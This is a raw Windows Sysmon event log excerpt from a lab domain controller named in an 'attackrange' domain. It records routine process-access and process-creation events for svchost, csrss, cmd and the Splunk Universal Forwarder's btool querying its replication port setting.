15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C77-5FA1-5800-000000008801}39163896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C77-5FA1-5900-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.462{D28789B6-7C77-5FA1-5900-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C77-5FA1-5800-000000008801}3916C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5800-000000008801}3916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5800-000000008801}3916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C77-5FA1-5700-000000008801}39083924C:\Windows\system32\cmd.exe{D28789B6-7C77-5FA1-5800-000000008801}3916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.458{D28789B6-7C77-5FA1-5800-000000008801}3916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C77-5FA1-5700-000000008801}3908C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5700-000000008801}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5700-000000008801}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.441{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C77-5FA1-5700-000000008801}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 